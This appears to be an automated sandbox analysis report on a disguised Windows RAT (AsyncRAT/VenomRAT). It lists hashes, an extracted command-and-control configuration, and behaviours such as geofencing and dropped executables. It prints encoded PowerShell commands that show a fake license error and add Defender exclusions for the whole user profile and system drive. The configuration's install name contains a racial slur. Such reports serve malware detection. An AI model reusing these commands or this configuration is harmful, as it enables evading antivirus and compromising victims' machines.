Analysis
-
max time kernel
145s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
07-02-2025 03:28
Static task
static1
Behavioral task
behavioral1
Sample
EXMSettingsRestoreUtility.exe
Resource
win7-20240903-en
General
-
Target
EXMSettingsRestoreUtility.exe
-
Size
122KB
-
MD5
15f043fb9ac824a896d33502ce43a501
-
SHA1
e8b8ff0633441603405bf83e57bafa385ca0e784
-
SHA256
59131a7e8725c4de5a4e1fe5e3febf9f861c22f58ad0cb179bf4d2f419613abf
-
SHA512
7e9756b1694be946d460d37188e9d193f3e128abe692ca770ef6893f8979800b017b23d4d4a42d6fa546bf12c5f495b3cb6e2fa866e1b805b8a997f50b46d1b9
-
SSDEEP
3072:Um8Y3AavY9QonIV6fAaCTgDEZ9DAxpz6+l5nlKv0Mp5:U23tvYaeIk5CTgDEZBMuw5nlKvnp
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
193.161.193.99:304480
nigger93
-
delay
1
-
install
true
-
install_file
nigger93.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
resource yara_rule behavioral2/files/0x0007000000023c67-13.dat VenomRAT behavioral2/memory/3676-25-0x00000000005E0000-0x00000000005F8000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023c67-13.dat family_asyncrat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation EXMSettingsRestoreUtility.exe Key value queried \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation revertsettings.exe -
Executes dropped EXE 2 IoCs
pid Process 3928 revertsettings.exe 3676 aurafarm.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\revertsettings.exe EXMSettingsRestoreUtility.exe File created C:\Windows\aurafarm.exe EXMSettingsRestoreUtility.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language revertsettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXMSettingsRestoreUtility.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1176 powershell.exe 1892 powershell.exe 1892 powershell.exe 1176 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 3676 aurafarm.exe Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe Token: SeIncreaseQuotaPrivilege 3676 aurafarm.exe Token: SeSecurityPrivilege 3676 aurafarm.exe Token: SeTakeOwnershipPrivilege 3676 aurafarm.exe Token: SeLoadDriverPrivilege 3676 aurafarm.exe Token: SeSystemProfilePrivilege 3676 aurafarm.exe Token: SeSystemtimePrivilege 3676 aurafarm.exe Token: SeProfSingleProcessPrivilege 3676 aurafarm.exe Token: SeIncBasePriorityPrivilege 3676 aurafarm.exe Token: SeCreatePagefilePrivilege 3676 aurafarm.exe Token: SeBackupPrivilege 3676 aurafarm.exe Token: SeRestorePrivilege 3676 aurafarm.exe Token: SeShutdownPrivilege 3676 aurafarm.exe Token: SeDebugPrivilege 3676 aurafarm.exe Token: SeSystemEnvironmentPrivilege 3676 aurafarm.exe Token: SeRemoteShutdownPrivilege 3676 aurafarm.exe Token: SeUndockPrivilege 3676 aurafarm.exe Token: SeManageVolumePrivilege 3676 aurafarm.exe Token: 33 3676 aurafarm.exe Token: 34 3676 aurafarm.exe Token: 35 3676 aurafarm.exe Token: 36 3676 aurafarm.exe Token: SeIncreaseQuotaPrivilege 3676 aurafarm.exe Token: SeSecurityPrivilege 3676 aurafarm.exe Token: SeTakeOwnershipPrivilege 3676 aurafarm.exe Token: SeLoadDriverPrivilege 3676 aurafarm.exe Token: SeSystemProfilePrivilege 3676 aurafarm.exe Token: SeSystemtimePrivilege 3676 aurafarm.exe Token: SeProfSingleProcessPrivilege 3676 aurafarm.exe Token: SeIncBasePriorityPrivilege 3676 aurafarm.exe Token: SeCreatePagefilePrivilege 3676 aurafarm.exe Token: SeBackupPrivilege 3676 aurafarm.exe Token: SeRestorePrivilege 3676 aurafarm.exe Token: SeShutdownPrivilege 3676 aurafarm.exe Token: SeDebugPrivilege 3676 aurafarm.exe Token: SeSystemEnvironmentPrivilege 3676 aurafarm.exe Token: SeRemoteShutdownPrivilege 3676 aurafarm.exe Token: SeUndockPrivilege 3676 aurafarm.exe Token: SeManageVolumePrivilege 3676 aurafarm.exe Token: 33 3676 aurafarm.exe Token: 34 3676 aurafarm.exe Token: 35 3676 aurafarm.exe Token: 36 3676 aurafarm.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 1628 wrote to memory of 1176 1628 EXMSettingsRestoreUtility.exe 84 PID 1628 wrote to memory of 1176 1628 EXMSettingsRestoreUtility.exe 84 PID 1628 wrote to memory of 1176 1628 EXMSettingsRestoreUtility.exe 84 PID 1628 wrote to memory of 1892 1628 EXMSettingsRestoreUtility.exe 86 PID 1628 wrote to memory of 1892 1628 EXMSettingsRestoreUtility.exe 86 PID 1628 wrote to memory of 1892 1628 EXMSettingsRestoreUtility.exe 86 PID 1628 wrote to memory of 3928 1628 EXMSettingsRestoreUtility.exe 88 PID 1628 wrote to memory of 3928 1628 EXMSettingsRestoreUtility.exe 88 PID 1628 wrote to memory of 3928 1628 EXMSettingsRestoreUtility.exe 88 PID 1628 wrote to memory of 3676 1628 EXMSettingsRestoreUtility.exe 89 PID 1628 wrote to memory of 3676 1628 EXMSettingsRestoreUtility.exe 89 PID 3928 wrote to memory of 2992 3928 revertsettings.exe 91 PID 3928 wrote to memory of 2992 3928 revertsettings.exe 91 PID 3928 wrote to memory of 2992 3928 revertsettings.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\EXMSettingsRestoreUtility.exe"C:\Users\Admin\AppData\Local\Temp\EXMSettingsRestoreUtility.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbgB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAcABjACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAGwAaQBjAGUAbgBzAGUALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAaAB4AGUAIwA+AA=="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbABoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAeQB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABxACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
C:\Windows\revertsettings.exe"C:\Windows\revertsettings.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7z7AC73F58\delete.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:2992
-
-
-
C:\Windows\aurafarm.exe"C:\Windows\aurafarm.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
486B
MD5a6cdc802f450a4dbd6bfa26988aac8e6
SHA1ecdfd079fd24ab03bbc436bf5370bae613a22c71
SHA256aef05757cfda5430c03b71f5bbf3abdec2529258af0d3656bc7801a920b9c5c2
SHA512f7670609663482834fb0eb1a3a5f34fe194b3ed2eccf8c4f9f848bdc6ba21547cb91e4d011a99cd2c1cd5205cdbf5ba945f1cd0755b658ed44df120c6d85a59d
-
Filesize
804B
MD5a5750c0882d205435451003cbe31d9f2
SHA1e30d35353f4e99ad62c1b7514a638ed55a1a35d5
SHA256173a92a2f66bde79504376fa94772687fdb9dc6539ff72a781acb3a23626e5c1
SHA512f9d2e5d7c30411d988712d8b8e0f75b5cbf303e35a9b1108ff57117dcaa1b9eef9e05d19f7f4c79c1fcb365b91c508f5f547f24b0a30a859e473d9916332bdfd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
74KB
MD580724101ed2cbfb0750ca6b7ac4a9f0e
SHA1f240dd5f7b52974adf43075e0b74126ceb380968
SHA256c866481dc9369e31e4d9a2eb296b2a35849f658141045bba8f879c0c8978bb36
SHA51205dc8267a217d69bedd525be275518e956c859fe781ed57cb8d342434c7c4787fadd0827d5e39a0da450ddd9f463ce91d4a7205a14eb328037af4a869c6fbbe3
-
Filesize
42KB
MD598cc493ee9f783b20c5d614529d6a34c
SHA1eaf1e20cddf94a131e1b5a85c629d91b631933f0
SHA25655ae6e6612a0106cb0b0723622014474259653c2bf6970eba4725875509e36f8
SHA512f656d45047abeb3f9532e0d606f3ebfb288033195b7c439eedec96761e3a049801a685129e41aed64d3f903882469fbe4e5c20aa15fd0f6e55bfa348d77d6ab9